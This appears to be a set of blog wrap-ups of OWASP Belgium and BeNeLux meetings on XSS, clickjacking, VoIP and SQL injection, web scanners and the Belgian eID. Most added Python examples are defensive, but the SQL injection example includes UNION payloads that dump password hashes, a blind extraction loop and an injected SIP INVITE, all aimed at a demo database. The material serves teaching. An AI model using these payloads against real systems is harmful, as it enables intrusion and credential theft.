First speaker, Tom Van Der Mussele from Verizon Business, spoke about “non-conventional attacks“. Tom explained that those types of attacks are difficult or impossible to pick up with your favourite web scanners (example: Nikto). Such tools expect data like error codes or specific output to trigger alerts. Why? It’s difficult for them to know the difference between authorized and unauthorized data sets (example: data sent to two different users). Expecting an HTTP return code “200” is not enough. More and more applications use XML streams for dynamic data querying and look like a real fat-client program, like Google Calendar. The goal of such attacks is to escape the content of this specific end-user (the XML streams are interpreted by the end-user’s browser). How to achieve the attacks? By analyzing the structure of the XML sheet when performing input manipulation, cookie modification or by playing with metadata like the user-agent. A classic scanner will try to replace values with funny stuff like “’1>0–”, but it can be very funny to replace the values with something else (fuzzing). Tom gave some examples of badly written web applications which were front-ends to legacy applications. It was easy to bypass the front-end by sending an unexpected key code like a function key. To summarize his talk: there is no way to automate tests on modern web applications. The main tools are an intercepting proxy like WebScarab (another OWASP project) and your brain! ;-)

The second speaker was Jim Manico: “The Ghost of XSS past, present and future“. Jim is an active member of the OWASP foundation and, amongst other projects, he’s the official OWASP Podcast editor. Jim is pushing for the participation of everybody in OWASP:

We are doing bad and OWASP is good! It’s free and you can learn a lot of security stuff. If you don’t collaborate, you’re stupid!

The message is clear. He started his presentation with a brief history of XSS attacks, then came to the conclusion that they will remain a classic in the future. Why? Most web pages have become more complex and the attacks will become more difficult to solve. Classic methods to block XSS are sometimes irrelevant. For example, the characters < ‘ ” or & are sometimes used for “regular” purposes. If you block single quotes in your e-commerce application, you’ll lose all your Irish customers! The situation today:

  • Untrusted data must be canonicalized
  • Untrusted data must be validated
  • Untrusted data must be contextually sanitized/encoded

Then, Jim presented some frameworks that get rid of XSS attacks through auto-escaping template technologies:

  • XHP from Facebook
  • Context Sensitive Auto-Sanitization (CSAS) from Google
  • Java XML Templates (JXT) from OWASP

The major trade-off for developers: they need to write highly compliant templates! Another protection is the usage of sandboxes.

At browser level, security can be increased by using “Content Security Policy”, which at the time was enabled with the response header “X-Content-Security-Policy“ (the standardized header is now Content-Security-Policy). Jim is a developer and talked to developers. Not being one, some ideas were sometimes difficult to follow for me. If you are interested, Jim’s slides about the same topic are available here.
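To make Jim’s three rules concrete, here is an added example (my own code, not from Jim’s talk or any OWASP project) that canonicalizes, validates, then encodes the same untrusted value for four output contexts, next to the quote-stripping blacklist the talk warns against. The template, the name allowlist and the “profile page” are assumptions made up for the demonstration.

```python
"""Canonicalize, validate, then encode per output context (added example)."""
import re
import unicodedata
import urllib.parse

_ALNUM = re.compile(r"[A-Za-z0-9]")
# Constructed allowlist: letters, spaces, hyphens and apostrophes, so O'Brien is welcome.
_NAME_OK = re.compile(r"^[A-Za-z' \-]{1,64}$")


def canonicalize(value, max_rounds=3):
    """Undo layered percent-encoding (bounded, so %2525... cannot loop forever)
    and normalise Unicode so validation sees one representation of the input."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return unicodedata.normalize("NFKC", value)


def validate_name(name):
    """Allowlist validation that still accepts Irish and double-barrelled names."""
    return bool(_NAME_OK.match(name))


def encode_html_body(s):
    """For text between tags: the five characters that can change HTML structure."""
    return (s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
             .replace('"', "&quot;").replace("'", "&#x27;"))


def encode_html_attr(s):
    """For attribute values: hex-entity everything non-alphanumeric, so even an
    unquoted attribute cannot be broken out of with a space or '='."""
    return "".join(c if _ALNUM.match(c) else "&#x%X;" % ord(c) for c in s)


def encode_js_string(s):
    """For data inside a quoted JavaScript string literal: \\xHH / \\uHHHH escapes.
    HTML entities are the wrong tool here: the parser does not decode them inside
    <script>, so the script would see the literal text &#x27; instead of the quote."""
    out = []
    for c in s:
        if _ALNUM.match(c):
            out.append(c)
        elif ord(c) < 256:
            out.append("\\x%02X" % ord(c))
        else:
            out.append("\\u%04X" % ord(c))  # BMP only; enough for this demo
    return "".join(out)


def encode_url_param(s):
    """For a value inside a query string."""
    return urllib.parse.quote(s, safe="")


# Constructed template: one untrusted value lands in four contexts. The title
# attribute is deliberately unquoted to show the attribute encoder must not rely on quotes.
TEMPLATE = (
    "<div title={attr}>{body}</div>\n"
    '<a href="/search?q={url}">more</a>\n'
    "<script>var who = '{js}';</script>"
)


def render_profile(raw_name):
    """Canonicalize -> validate -> contextually encode, in that order."""
    name = canonicalize(raw_name)
    if not validate_name(name):
        raise ValueError("name rejected by allowlist")
    return TEMPLATE.format(attr=encode_html_attr(name), body=encode_html_body(name),
                           url=encode_url_param(name), js=encode_js_string(name))


def render_naive(raw_name):
    """The blacklist the talk argues against: strip quotes and angle brackets and
    paste the rest everywhere. It mangles honest names and still misses payloads
    that need neither character."""
    stripped = re.sub(r"""['"<>]""", "", raw_name)
    return TEMPLATE.format(attr=stripped, body=stripped, url=stripped, js=stripped)


if __name__ == "__main__":
    print(render_profile("O%2527Brien"))
    print(render_naive("x onmouseover=alert(1)"))
```

Run it and compare the two outputs: the naive page both loses the apostrophe in O’Brien and ends up with `title=x onmouseover=alert(1)`, an event handler injected without a single quote or angle bracket, while the encoded page keeps the apostrophe in every context and rejects or neutralizes the payload.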

Finally, Christian Van Heurck introduced the Belgian CERT (CERT.be). This organization has two roles: reactive and proactive. They are the “fire brigade of the Internet” and perform incident handling, like the recent issue with dns.be. The Belgian CERT is in contact with other CERTs worldwide and Christian insisted on the trusted relationship established between all those organizations. To increase communication efficiency, it’s mandatory to meet and know the people. The best way remains to have some beers! :-) It’s important to share information. About the tools, some are already in place, like abusehelper.be (to automate the processing of incident notifications). But other projects are in the pipeline to increase collaboration (no more details as I don’t know their official status).

OWASP BeNeLux Day 2010 Wrap Up

OWASP Kit

Yesterday, the three OWASP BeNeLux chapters organized together their annual OWASP BeNeLux Day. This edition was held at the Fontys Hogeschool in Eindhoven (NL). First detail of this year, the weather conditions! After more than three hours of driving on snowy roads, I finally reached Eindhoven. Just in time for a coffee and to connect to the WiFi before the talks.

The event started with a welcome word by the local Netherlands chapter and by Seba Deleersnyder (from the Belgium chapter), who reviewed the status of some projects amongst the huge number currently in the pipeline. In a few words:

  • New risk based OWASP Top-10
  • New testing guide and code review guide (v4). Release in the beginning of 2011?
  • OWASP numbering system
  • pythonsecurity.org
  • New mobile group started
  • Improving the browser security with Mozilla
  • OWASP O2 platform
  • Modsecurity CRS (“Core Rule Set“).

The complete list of those projects (122!) is available here.

The first speaker was Marco Balduzzi from Eurecom. He talked about the “Clickjacking” attack. In a few months, the name “ClickJacking” became very popular. The number of hits returned by Google keeps growing, but is it really a threat or just buzz? It is a real type of attack: Marco reviewed the “Twitter Bomb” attack, which generated self-replicating Twitter messages by abusing some HTML/CSS features. But what is the prevalence of such attacks on the Internet? To track them, Marco built an automated system based on browser scenarios. To replicate user behavior, it uses the X.org libraries to move the mouse and generate clicks. The browser is protected by NoScript & ClickIDS (to reduce the risk of false positives). He scanned an initial set of 70K URLs and analyzed more than one million Internet pages using a cluster of 10 Linux VMs (at a rate of 15K pages/day). The results? 37% of pages contained iFrames but only 0.16% contained transparent iFrames. Only two (2!) real attacks were detected. Marco’s conclusion is that ClickJacking attacks really exist but are not the preferred method of malicious guys. Finally, he reviewed some mitigation techniques like the X-FRAME-OPTIONS header.
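As an added illustration of the two sides of Marco’s talk (this is my own code, not Marco’s crawler or ClickIDS), the following Python script flags iframes whose inline style makes them transparent yet clickable, the structural signature a clickjacking page needs, and checks whether a response’s headers would let the page be framed at all. The sample page and headers are constructed for the demo; the 0.1 opacity threshold is an assumption.

```python
"""Transparent-iframe heuristic and framing-protection check (added example)."""
from html.parser import HTMLParser


def parse_style(style):
    """Turn 'opacity: 0; position:absolute' into {'opacity': '0', 'position': 'absolute'}."""
    props = {}
    for decl in style.split(";"):
        name, sep, value = decl.partition(":")
        if sep:
            props[name.strip().lower()] = value.strip().lower()
    return props


def is_transparent(props):
    """True when the inline style hides the element while leaving it clickable:
    CSS opacity below 0.1 (assumed threshold) or the legacy IE alpha filter at 0."""
    opacity = props.get("opacity")
    if opacity is not None:
        try:
            if float(opacity) < 0.1:
                return True
        except ValueError:
            pass
    return "opacity=0)" in props.get("filter", "").replace(" ", "")


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def find_transparent_iframes(html):
    """Return (src, style properties) for every iframe hidden by its inline style."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for attrs in parser.iframes:
        props = parse_style(attrs.get("style", ""))
        if is_transparent(props):
            hits.append((attrs.get("src", ""), props))
    return hits


def allows_framing(headers):
    """Defender's side: does this response permit being framed by other origins?
    X-Frame-Options DENY/SAMEORIGIN, or a CSP frame-ancestors directive that is
    not a bare '*', refuses framing. Header names are matched case-insensitively."""
    lowered = {k.lower(): v for k, v in headers.items()}
    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    for directive in lowered.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors" and "*" not in tokens[1:]:
            return False
    return True


# Constructed page: one honest video embed, one invisible frame laid over the bait button.
SAMPLE_PAGE = """<html><body>
<h1>You won a prize!</h1>
<iframe src="https://video.example/embed/42" width="400" height="300"></iframe>
<button id="bait" style="position:absolute;top:120px;left:80px">Claim it</button>
<iframe src="https://bank.example/transfer"
        style="opacity:0; position:absolute; top:0; left:0; width:100%; height:100%; z-index:10">
</iframe>
</body></html>"""

if __name__ == "__main__":
    for src, props in find_transparent_iframes(SAMPLE_PAGE):
        print("suspicious iframe:", src, props)
    print("framable without headers:", allows_framing({}))
    print("framable with DENY:", allows_framing({"X-Frame-Options": "DENY"}))
```

Only the second iframe is reported: the video embed is opaque, which is why Marco’s 37% of pages with iframes shrink to 0.16% with transparent ones. Note the heuristic only sees inline styles; a real crawler also has to evaluate stylesheets and scripts that set opacity at runtime.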

Radu State, from the University of Luxembourg, gave an excellent talk about “Owning networks via VoIP and web attacks“. Normally, VoIP is not in the OWASP scope, but Radu explained how to conduct web attacks through SIP devices. The presentation started with examples of common attacks against SIP phones. Most of them are vulnerable, often just by sending a single packet! The worst case is the one against China’s Grandtouch phones, which can easily be switched into “spy mode” (is it a bug or a feature?). To search for SIP vulnerabilities, Radu uses a fuzzer called KIF. The second part focused on ways to use SIP devices to perform SQL injections and XSS attacks. Example:

  INVITE sip:<sqlinjection>@PBX

SIP was renamed by Radu “UFBP” or “Universal Firewall Bypass Protocol“. Indeed, SIP is often allowed through firewalls without any further inspection, and SIP proxies are reachable from the Internet. Another issue with IP phones: users consider them “just a phone”, but each one is a computer. They also embed web servers, and this is the attack vector. Even if your phones are connected to a dedicated VLAN, users will access them via their browser from the internal LAN. Some demos (videos) showed how to create a user in the VoIP system, how to redirect users to malicious sites or how to perform network reconnaissance. A great talk!

Just before lunch, Matias Madou presented “Finding back-doors in code“. This was the same talk as the one presented during BruCON in September. Matias explained why software has back-doors, what the motivations of insiders are (gain, vengeance) and the different types of back-doors found in code (with examples). Then, he reviewed methods and techniques to analyze the code and find them.

Thierry Zoller presented “How to NOT implement a Payback/Cashback system“. Thierry described what “Payback” systems are and why they are so popular.

“In marketing generally and in retailing more specifically, a loyalty card, rewards card, points card, advantage card or club card is a plastic or paper card, visually similar to a credit card or debit card, that identifies the card holder as a member in a loyalty program. Loyalty cards are a system of the loyalty business model. In the United Kingdom it is typically called a loyalty card, in Canada a rewards card or a points card, and in the United States either a discount card, a club card or a rewards card. Cards typically have a barcode or magstripe that can be easily scanned, and some are even chip cards. Small keyring cards (also known as keytags) which serve as key fobs are often used for convenience in carrying and ease of access.” (Source: wikipedia.org)

Then he reviewed the weaknesses of a specific, massively deployed system. At Thierry’s request, no more information will be disclosed here.

The next talk was about “Botnets / Bredolab”, presented by Michael Sandee. He started with a generic introduction to botnets. They receive more and more attention from the media and lead to hot debates. Bredolab is the name of a piece of malware (also called “BManager“). Bredolab is in fact available for sale and has generated a lot of different botnets. Michael explained how they are deployed and how they are managed to generate huge amounts of money. Good cybercrime review!

Nick Nikiforakis discussed the privacy of file sharing services. Those services are common today (you have certainly already uploaded a file to Rapidshare). If you care about your privacy, select your file sharing service wisely! Nick explained how most of those services work. No surprise, they are cloud based and suffer from the common cloud weaknesses: unknown physical locations, privacy but also availability. A cloud environment can also suffer data loss (examples: Amazon EC2 in 2007 or Microsoft and the T-Mobile Sidekick data in 2009). Back to the file sharing services, they are very easy to use: just upload and share the URL returned by the service. But how are those URLs generated? Nick analyzed eight well-known services. He uploaded the same file several times in a short interval and tried to find out how they generated the returned tokens. File sharing services protect themselves through obscurity (files can be accessed only by their ID). Really? Most generated keys are predictable. If you have an initial valid token, you can enumerate the whole database of files. Nick tried that via a script and got… too much data to be analyzed manually! Amongst the grabbed files, he found: death certificates, bank statements, company budgets & salaries, medical transcriptions (file sharing services are often used by translation services). Once you get the information, you just use it to conduct regular attacks (espionage, mailing, racket, etc). To conclude: take care when choosing your file sharing service. Always encrypt the file content and delete it once shared with your peers. For companies, it could be a good idea to restrict them.

Chen Gour-Arie talked about “The social networking corporate threat”, or what threats social networks add in corporate environments. They are used by “internal” users, but organizations also use them as a communication channel. Chen gave some figures, threats and how to penetrate an organization using social networks. What are the risks?

  • Information leakage
  • Social engineering
  • network infiltration
  • Application layer attack

The path is always the same: study -> approach -> attack. Via a demo video, he explained how to exploit a corporate environment in less than 7 minutes!

Finally, Walter Belgers presented “Attacking is easy, defending is hard“. Working as a defender, you have to find ALL the weaknesses of an infrastructure. From the attacker’s perspective, one is enough! The weak spots are the applications, the users and physical access (e.g. a shared colocation). Walter reviewed the common problems when physical access to a device is possible. He also explained best practices with software: you do not only need to install software, you need to configure it (hardening) properly. Too many applications are installed with default settings (SCADA products are a good bad example). How to protect yourself? By using multiple lines of defense, by logging and monitoring everything (detection) and by having a plan ready (reaction). User education (awareness) is also mandatory. How will users react to this:

Credit Card Check

The day ended with the CTF results and acknowledgements. Book the next event already: 30th November – 1st December 2011 in Luxembourg. Great organization by OWASP!

OWASP BE Meeting about SQL Injections’ OR 2=2;

Joe Mc Cray / OWASP

Surprise! The OWASP Belgian Chapter sent a late notification to announce an extra chapter meeting with a special guest: Joe McCray from Learn Security Online. Today’s topic was “Advanced SQL injections“. Joe is a well-known security specialist with high skills in penetration testing. He was in Belgium to provide training and it was a good opportunity to invite him. Thanks to OWASP-BE!

[Note: Joe will give a training during the 2nd edition of BruCON in September: "Pentesting High Security Environments". If you are interested, more details are available here]

Only a few people were present tonight, I suppose due to the late notification. Too bad, because Joe’s presentation was really cool. First, he puts on a show! He is not afraid to say what he thinks in his own words. I should have counted the number of times he said “Fix your shit!” ;-)

The presentation started with small examples of basic SQL injections: just by adding an extra single quote to a URL parameter, it’s possible to detect whether the site is vulnerable or not. An important remark about the database enumeration process: if you detect that the database server hosts a lot of databases, there is maybe a shared environment somewhere. Remember that, even if your site is bullet-proof (ok, ok, none are), your security may be affected by a badly protected neighbor site on the same server. Keep this in mind!

To summarize briefly, SQL injection attacks are based on a three-step process:

  • Identify the target (enumeration, version disclosure, etc)
  • Define how to attack
  • Protect yourself so as not to get caught!

There are three classes of SQL injections:

  • In-band (the same channel is used to send the attack and get the results)
  • Out-of-band (data is retrieved using a different channel, for example connections initiated by the database server itself)
  • Inferential, or blind (no data is returned to the attacker, only the website’s behavior is affected – for example response timing)

Joe also explained how it is possible to grab interesting data like user names, database names, version or paths using the UNION syntax. The queries become more and more complex but, with some practice, it becomes a simple brain mechanism. After the offensive part, he reviewed the defensive part and the classic mistakes to avoid:

  • Client side filtering?
  • Restrictive blacklists?
  • Signature based IDS?

Forget them! It’s easy to bypass those countermeasures, often just by changing the encoding or thanks to stupid rules. The next step was a brief introduction to techniques to detect IDS and WAFs (“Web Application Firewall“). Those systems suffer from a major lack of decoding. In the worst case, they don’t support extra encodings (like HEX, UTF, etc.) or they just support a few of them. Why? Because decoding the URLs against all the methods requires a lot of CPU cycles. A WAF can only be considered a temporary fix until the detected issue has been fixed by the developers. About the developers, Joe suggests reporting all security holes as regular “bugs”. Developers are not aware of security, but they are “bug hunters”.
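The following added example ties together Joe’s three steps (detect with a lone quote, extract with UNION, infer blindly) and Radu’s “INVITE sip:<sqlinjection>@PBX” from the BeNeLux Day wrap-up above: the same unsafe lookup is reached once through a plain parameter and once through the percent-decoded user part of a SIP Request-URI, which is what makes SIP an “UFBP” for an application behind it. This is my own Python against an in-memory SQLite database, not code from either talk or from any PBX; the PBX schema, the sample INVITE and the data are constructed for the demonstration.

```python
"""SQL injection via an HTTP parameter or a SIP Request-URI (added example)."""
import re
import sqlite3
import string
import urllib.parse


def make_pbx_db():
    """Constructed sample data standing in for a PBX's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE extensions(ext TEXT PRIMARY KEY, owner TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT);
        INSERT INTO extensions VALUES ('1001', 'Alice'), ('1002', 'Bob');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99'),
                                 (2, 'alice', 'e99a18c428cb38d5f260853678922e03');
    """)
    return conn


def lookup_vulnerable(conn, ext):
    """The classic mistake: the untrusted value is pasted into the SQL text."""
    sql = "SELECT owner, ext FROM extensions WHERE ext = '" + ext + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, ext):
    """Bound parameter: the value can never change the statement's structure."""
    return conn.execute("SELECT owner, ext FROM extensions WHERE ext = ?", (ext,)).fetchall()


def sip_request_uri_user(message):
    """Percent-decoded user part of the Request-URI of a SIP request line such as
    'INVITE sip:1001@pbx.example SIP/2.0'. RFC 3261 allows escaped characters in
    the user part, so spaces travel as %20 and reach the application decoded."""
    request_line = message.splitlines()[0]
    _method, uri, _version = request_line.split(" ", 2)
    match = re.match(r"sips?:([^@;>]+)@", uri)
    if not match:
        raise ValueError("no user part in Request-URI")
    return urllib.parse.unquote(match.group(1))


def probe_single_quote(conn, lookup):
    """Step 1 of the talk: a lone quote that produces a database error is the
    first sign that the lookup is injectable."""
    try:
        lookup(conn, "'")
    except sqlite3.OperationalError:
        return True
    return False


def blind_extract(conn, lookup, charset=string.ascii_lowercase + string.digits, max_len=32):
    """Inferential injection: nothing from the users table is ever echoed; one
    character of admin's username is inferred per round from whether the
    extension 1001 lookup still returns its row."""
    found = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            payload = ("1001' AND (SELECT substr(username,%d,1) FROM users WHERE id=1) = '%s"
                       % (pos, c))
            if lookup(conn, payload):
                found += c
                break
        else:
            return found  # no candidate matched: the string has ended
    return found


# In-band extraction with UNION: the closing quote of the original query is commented out.
UNION_USERS = "' UNION SELECT username, pwhash FROM users--"
UNION_VERSION = "' UNION SELECT sqlite_version(), NULL--"

# Constructed SIP INVITE carrying UNION_USERS percent-encoded in the Request-URI user part.
SAMPLE_INVITE = (
    "INVITE sip:" + urllib.parse.quote(UNION_USERS, safe="'-,") + "@pbx.example SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:attacker@192.0.2.10>;tag=1928301774\r\n"
    "To: <sip:1001@pbx.example>\r\n"
    "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    "CSeq: 1 INVITE\r\n\r\n"
)

if __name__ == "__main__":
    db = make_pbx_db()
    print("injectable:", probe_single_quote(db, lookup_vulnerable))
    print("via SIP:", lookup_vulnerable(db, sip_request_uri_user(SAMPLE_INVITE)))
    print("version:", lookup_vulnerable(db, UNION_VERSION))
    print("blind:", blind_extract(db, lookup_vulnerable))
    print("safe:", lookup_safe(db, UNION_USERS))
```

The quote probe, the UNION dumps and the blind loop all work against lookup_vulnerable and all fail against lookup_safe, which is the whole defensive message: none of the bypassable layers (client-side filtering, blacklists, signatures) are involved, the statement structure simply cannot be altered. The SIP path shows why a WAF in front of the web interface does not help when the same query is reachable over port 5060.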

After the presentation, a relaxed informal discussion continued over several security topics. It was interesting to compare the security landscapes in Europe and in the United States.

OWASP Belgium Chapter Meeting Wrap Up

OWASP Belgium Chapter Meeting

I’m back from the latest OWASP Belgium Chapter meeting. Belgium is a small country with a lot of political issues (off-topic here ;-) ) but also a great electronic identity card or “eID“. Almost all Belgian citizens have had an eID for a while (8.2 million cards have been delivered to date). Coupled with a PIN code, the card can be used for several purposes:

  • To identify the owner;
  • To authenticate the owner (using the PIN code);
  • To sign documents

Of course, the eID can be used online with compatible websites. This was the first topic covered tonight. Erwin Geirnaert and Frank Cornelis presented “The Belgian e-ID: hacker vs developer“. The second part was given by Larry Suto about the accuracy of web application scanners.

Frank started with a deep technical presentation of the Belgian eID card (from the physical structure to the data contained on it and the software used to access it). Even if the card has information printed on it, other information is only available on the chip (like the home address). The card contains PKI elements (RSA keys), the owner’s picture, an identity file, an address file and a PKCS#15 structure. The Belgian authorities operate a PKI infrastructure to work with the eID. Some actions are available without authentication, like basic identification: just insert your card in a compatible reader and your data are available to everyone. On the other side, to be authenticated (to prove that you are really the owner of the card), you need to give a PIN code (two-factor authentication: the card and the PIN). The same applies to digitally signing documents. Then Frank explained how to integrate the eID in web applications. The requirements are:

  • It must be easy;
  • It must be secure (of course!);
  • It must be platform independent (operating systems & browsers);
  • And… idiot proof!

Don’t forget that everybody has an eID and not all people are security experts! (even if some pretend to be ;-) ). The latest eID applet is based on Java 6 and does not require any installation on the user side. If you are interested, the code is available on Google Code under the GPLv3 license. One of the remaining problems is the risk of PIN codes stolen via key loggers. That’s why some critical applications require a specific card reader with a built-in keypad. The new applet also implements an integrity control which prevents data read from the card from being altered by a MitM attack. About the digital signature feature, two types of documents/applications are supported: OpenOffice and Microsoft Office.

After the technical details about implementing the eID in web applications, Erwin, “the bad guy”, gave some bad examples. First, implementing the eID in web sites will not protect you against the classic web vulnerabilities! It’s just a new way to authenticate users. Keep your developers aware of this. What are the common bad implementations?

  • Identification is not the same as authentication! (just inserting your card, without the PIN, is not a safe way to authenticate you)
  • No HTTPS! The eID data can be sniffed!
  • Unsecured trust in a 3rd-party product (like in the Drupal case)
  • Data automatically intercepted by a reverse proxy (and forwarded in clear text)
  • After a successful authentication, relying on a cookie to keep the session alive.

Frank performed some demonstrations using WebScarab and showed how easy it is to capture and change the eID data on the fly (without integrity verification, of course). Note that a nice project is ongoing: an official validation of web sites providing eID authentication (via L-SEC).

The second part of the meeting was dedicated to Larry Suto from Strategic Data Command. Larry tested several web scanners for their accuracy and presented a summary of his report. The study focused on four points:

  • The accuracy of the scanners using a “point & shoot” configuration (or “out-of-the-box”);
  • The accuracy of the scanners using a fine-tuned configuration;
  • The accuracy of the reported vulnerabilities;
  • And the time required to ensure quality results

He performed his tests using commercial solutions (Acunetix, AppScan, Burp Suite Pro, Hailstorm, NTOSpider, Qualys and WebInspect). The tested web sites were those provided by the solution vendors themselves. Here are some facts discovered by Larry:

  • Each scanner is different in the way it performs the scans;
  • Scanners did not work best against their own test server;
  • Point & shoot configurations: lots of problems with badly handled authentication;
  • The web site language can be an issue for false positives: look at non-English sites (example: “error” – “faut” – “erreur”);
  • Scanning in the cloud (e.g. Qualys) is limited in features (like JavaScript support)

In a new version of the report, some open source scanners may be added, like Skipfish or w3af. But at the moment, they give poor results compared to the commercial solutions.

The job performed by web app scanners is difficult compared to classic vulnerability scans. In this case, there is no simple signature or pattern to detect. A lot of actions must be performed from a human point of view. That’s why web scanner users can be grouped in two categories: a first one which finds the “point & shoot” operating mode enough to reach their expected security level, and a second one which thinks that no automatic scanning can be used due to the complexity of modern web sites.

Note to Larry: what about a “webscannertotal.com”, like virustotal.com, where we could test the same web site against several scanners at the same time? :-)

Judging by the audience (the room was full of known and unknown faces), OWASP meetings are more and more successful in Belgium. That’s good!